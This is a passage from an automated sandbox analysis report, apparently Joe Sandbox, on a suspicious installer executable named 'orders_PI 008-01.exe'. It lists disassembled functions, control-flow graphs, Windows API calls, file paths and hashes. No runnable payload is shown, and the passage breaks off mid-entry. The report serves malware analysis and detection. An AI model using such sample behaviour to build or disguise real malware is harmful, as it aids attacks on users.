                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                        • API String ID: 1975747703-39584036
                                        • Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                        • Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
                                        • Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                        • Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D
                                        Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 318 403015-403063 GetTickCount GetModuleFileNameW call 405ee4 321 403065-40306a 318->321 322 40306f-40309d call 4063ee call 405d0f call 4063ee GetFileSize 318->322 323 403245-403249 321->323 330 4030a3 322->330 331 403188-403196 call 402fb1 322->331 333 4030a8-4030bf 330->333 337 403198-40319b 331->337 338 4031eb-4031f0 331->338 335 4030c1 333->335 336 4030c3-4030cc call 403444 333->336 335->336 344 4031f2-4031fa call 402fb1 336->344 345 4030d2-4030d9 336->345 340 40319d-4031b5 call 40345a call 403444 337->340 341 4031bf-4031e9 GlobalAlloc call 40345a call 40324c 337->341 338->323 340->338 364 4031b7-4031bd 340->364 341->338 369 4031fc-40320d 341->369 344->338 349 403155-403159 345->349 350 4030db-4030ef call 405e9f 345->350 354 403163-403169 349->354 355 40315b-403162 call 402fb1 349->355 350->354 367 4030f1-4030f8 350->367 360 403178-403180 354->360 361 40316b-403175 call 4068d0 354->361 355->354 360->333 368 403186 360->368 361->360 364->338 364->341 367->354 373 4030fa-403101 367->373 368->331 370 403215-40321a 369->370 371 40320f 369->371 374 40321b-403221 370->374 371->370 373->354 375 403103-40310a 373->375 374->374 377 403223-40323e SetFilePointer call 405e9f 374->377 375->354 376 40310c-403113 375->376 376->354 378 403115-403135 376->378 381 403243 377->381 378->338 380 40313b-40313f 378->380 382 403141-403145 380->382 383 403147-40314f 380->383 381->323 382->368 382->383 383->354 384 403151-403153 383->384 384->354
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00403026
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\orders_PI 008-01.exe,00000400,?,?,?,?), ref: 00403042
                                          • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 00405EE8
                                          • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,?,?), ref: 00405F0A
                                        • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\orders_PI 008-01.exe,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 0040308E
                                        • GlobalAlloc.KERNELBASE(?,?,?,?,?,?), ref: 004031C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\orders_PI 008-01.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                        • API String ID: 2803837635-1034390895
                                        • Opcode ID: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                        • Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
                                        • Opcode Fuzzy Hash: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                        • Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D
                                        Function 0040642B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 449 40642b-406436 450 406438-406447 449->450 451 406449-40645f 449->451 450->451 452 406465-406472 451->452 453 406677-40667d 451->453 452->453 456 406478-40647f 452->456 454 406683-40668e 453->454 455 406484-406491 453->455 457 406690-406694 call 4063ee 454->457 458 406699-40669a 454->458 455->454 459 406497-4064a3 455->459 456->453 457->458 461 406664 459->461 462 4064a9-4064e7 459->462 465 406672-406675 461->465 466 406666-406670 461->466 463 406607-40660b 462->463 464 4064ed-4064f8 462->464 469 40660d-406613 463->469 470 40663e-406642 463->470 467 406511 464->467 468 4064fa-4064ff 464->468 465->453 466->453 474 406518-40651f 467->474 468->467 471 406501-406504 468->471 472 406623-40662f call 4063ee 469->472 473 406615-406621 call 406335 469->473 475 406651-406662 lstrlenW 470->475 476 406644-40664c call 40642b 470->476 471->467 477 406506-406509 471->477 487 406634-40663a 472->487 473->487 479 406521-406523 474->479 480 406524-406526 474->480 475->453 476->475 477->467 483 40650b-40650f 477->483 479->480 485 406561-406564 480->485 486 406528-406546 call 4062bc 480->486 483->474 488 406574-406577 485->488 489 406566-406572 GetSystemDirectoryW 485->489 495 40654b-40654f 486->495 487->475 491 40663c 487->491 493 4065e2-4065e4 488->493 494 406579-406587 GetWindowsDirectoryW 488->494 492 4065e6-4065ea 489->492 496 4065ff-406605 call 40669d 491->496 492->496 501 4065ec 492->501 493->492 498 406589-406593 493->498 494->493 499 406555-40655c call 40642b 495->499 500 4065ef-4065f2 495->500 496->475 503 406595-406598 498->503 504 4065ad-4065c3 SHGetSpecialFolderLocation 498->504 499->492 500->496 506 4065f4-4065fa lstrcatW 500->506 501->500 503->504 507 40659a-4065a1 503->507 508 4065c5-4065dc SHGetPathFromIDListW CoTaskMemFree 504->508 509 4065de 504->509 506->496 511 4065a9-4065ab 507->511 508->492 508->509 509->493 511->492 511->504
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040656C
                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 0040657F
                                        • SHGetSpecialFolderLocation.SHELL32(0040548D,0079A700,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 004065BB
                                        • SHGetPathFromIDListW.SHELL32(0079A700,Call), ref: 004065C9
                                        • CoTaskMemFree.OLE32(0079A700), ref: 004065D4
                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065FA
                                        • lstrlenW.KERNEL32(Call,00000000,007A0F28,?,0040548D,007A0F28,00000000), ref: 00406652
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 717251189-1230650788
                                        • Opcode ID: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                        • Instruction ID: 6a9894c1754425a34e634a53c322024ca71031740d406166b65bc8419ebad360
                                        • Opcode Fuzzy Hash: aaa997f56c542f4584990acf2269000a5d9ad94e2d12eeb77129bcfb95bdb2f4
                                        • Instruction Fuzzy Hash: A261F471600505ABDF249F24DD40ABE37A5AF51318F22813FE543BA2D4DB3D8AA1CB5E
                                        Function 00405456 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 512 405456-40546b 513 405471-405482 512->513 514 405522-405526 512->514 515 405484-405488 call 40642b 513->515 516 40548d-405499 lstrlenW 513->516 515->516 518 4054b6-4054ba 516->518 519 40549b-4054ab lstrlenW 516->519 520 4054c9-4054cd 518->520 521 4054bc-4054c3 SetWindowTextW 518->521 519->514 522 4054ad-4054b1 lstrcatW 519->522 523 405513-405515 520->523 524 4054cf-405511 SendMessageW * 3 520->524 521->520 522->518 523->514 525 405517-40551a 523->525 524->523 525->514
                                        APIs
                                        • lstrlenW.KERNEL32(007A0F28,00000000,0079A700,755723A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                        • lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,755723A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                        • lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,755723A0), ref: 004054B1
                                        • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2531174081-0
                                        • Opcode ID: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                        • Instruction ID: 198c43ce2186877ab3aec1728abe16fb3d15ea5683a6b9ae92d40c5f72e5eea1
                                        • Opcode Fuzzy Hash: 0decb5d3bd7311ee25dcb4cac47719bdc9880b480b93dcede20cbb014160680e
                                        • Instruction Fuzzy Hash: EC21AF75900518BACB119F65DD44ACFBFB9EF89354F10802AF904B22A1C3798A81CFA8
                                        Function 00405925 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 526 405925-405970 CreateDirectoryW 527 405972-405974 526->527 528 405976-405983 GetLastError 526->528 530 40599d-40599f 527->530 529 405985-405999 SetFileSecurityW 528->529 528->530 529->527 531 40599b GetLastError 529->531 531->530
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                        • GetLastError.KERNEL32 ref: 0040597C
                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405991
                                        • GetLastError.KERNEL32 ref: 0040599B
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040594B
                                        • C:\Users\user\Desktop, xrefs: 00405925
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                        • API String ID: 3449924974-1326413622
                                        • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                        • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                        • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                        • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9
                                        Function 00406773 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 532 406773-406793 GetSystemDirectoryW 533 406795 532->533 534 406797-406799 532->534 533->534 535 4067aa-4067ac 534->535 536 40679b-4067a4 534->536 538 4067ad-4067e0 wsprintfW LoadLibraryExW 535->538 536->535 537 4067a6-4067a8 536->537 537->538
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                        • wsprintfW.USER32 ref: 004067C5
                                        • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll$UXTHEME$\
                                        • API String ID: 2200240437-1946221925
                                        • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                        • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                        • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                        • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8
                                        Function 00405F13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 602 405f13-405f1f 603 405f20-405f54 GetTickCount GetTempFileNameW 602->603 604 405f63-405f65 603->604 605 405f56-405f58 603->605 607 405f5d-405f60 604->607 605->603 606 405f5a 605->606 606->607
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405F31
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\orders_PI 008-01.exe",004034A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                        • nsa, xrefs: 00405F20
                                        • "C:\Users\user\Desktop\orders_PI 008-01.exe", xrefs: 00405F13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-817891363
                                        • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                        • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                        • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                        • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58
                                        Function 6FF41777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 608 6ff41777-6ff417b6 call 6ff41b5f 612 6ff418d6-6ff418d8 608->612 613 6ff417bc-6ff417c0 608->613 614 6ff417c2-6ff417c8 call 6ff4239e 613->614 615 6ff417c9-6ff417d6 call 6ff423e0 613->615 614->615 620 6ff41806-6ff4180d 615->620 621 6ff417d8-6ff417dd 615->621 622 6ff4182d-6ff41831 620->622 623 6ff4180f-6ff4182b call 6ff425b5 call 6ff415b4 call 6ff41272 GlobalFree 620->623 624 6ff417df-6ff417e0 621->624 625 6ff417f8-6ff417fb 621->625 629 6ff41833-6ff4187c call 6ff415c6 call 6ff425b5 622->629 630 6ff4187e-6ff41884 call 6ff425b5 622->630 646 6ff41885-6ff41889 623->646 627 6ff417e2-6ff417e3 624->627 628 6ff417e8-6ff417e9 call 6ff42af8 624->628 625->620 631 6ff417fd-6ff417fe call 6ff42d83 625->631 635 6ff417e5-6ff417e6 627->635 636 6ff417f0-6ff417f6 call 6ff42770 627->636 642 6ff417ee 628->642 629->646 630->646 639 6ff41803 631->639 635->620 635->628 645 6ff41805 636->645 639->645 642->639 645->620 651 6ff418c6-6ff418cd 646->651 652 6ff4188b-6ff41899 call 6ff42578 646->652 651->612 654 6ff418cf-6ff418d0 GlobalFree 651->654 658 6ff418b1-6ff418b8 652->658 659 6ff4189b-6ff4189e 652->659 654->612 658->651 661 6ff418ba-6ff418c5 call 6ff4153d 658->661 659->658 660 6ff418a0-6ff418a8 659->660 660->658 662 6ff418aa-6ff418ab FreeLibrary 660->662 661->651 662->658
                                        APIs
                                          • Part of subcall function 6FF41B5F: GlobalFree.KERNEL32(?), ref: 6FF41DD4
                                          • Part of subcall function 6FF41B5F: GlobalFree.KERNEL32(?), ref: 6FF41DD9
                                          • Part of subcall function 6FF41B5F: GlobalFree.KERNEL32(?), ref: 6FF41DDE
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF41825
                                        • FreeLibrary.KERNEL32(?), ref: 6FF418AB
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF418D0
                                          • Part of subcall function 6FF4239E: GlobalAlloc.KERNEL32(?,?), ref: 6FF423CF
                                          • Part of subcall function 6FF42770: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,6FF417F6,00000000), ref: 6FF42840
                                          • Part of subcall function 6FF415C6: wsprintfW.USER32 ref: 6FF415F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                        • String ID:
                                        • API String ID: 3962662361-3916222277
                                        • Opcode ID: 3a947f3756ace00ce0007f1c81de9565843bbd0aa4b2c24e24a93780ace049b0
                                        • Instruction ID: bc47a2fb7062d31cac1f250132148f8e060b6445734eb0557aa3f620a042c6ed
                                        • Opcode Fuzzy Hash: 3a947f3756ace00ce0007f1c81de9565843bbd0aa4b2c24e24a93780ace049b0
                                        • Instruction Fuzzy Hash: C741E6714003059ADF12AF78D884BD63FA8BF05324F044176ED25EE2D7DB78A1A8C764
                                        Function 00405DCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
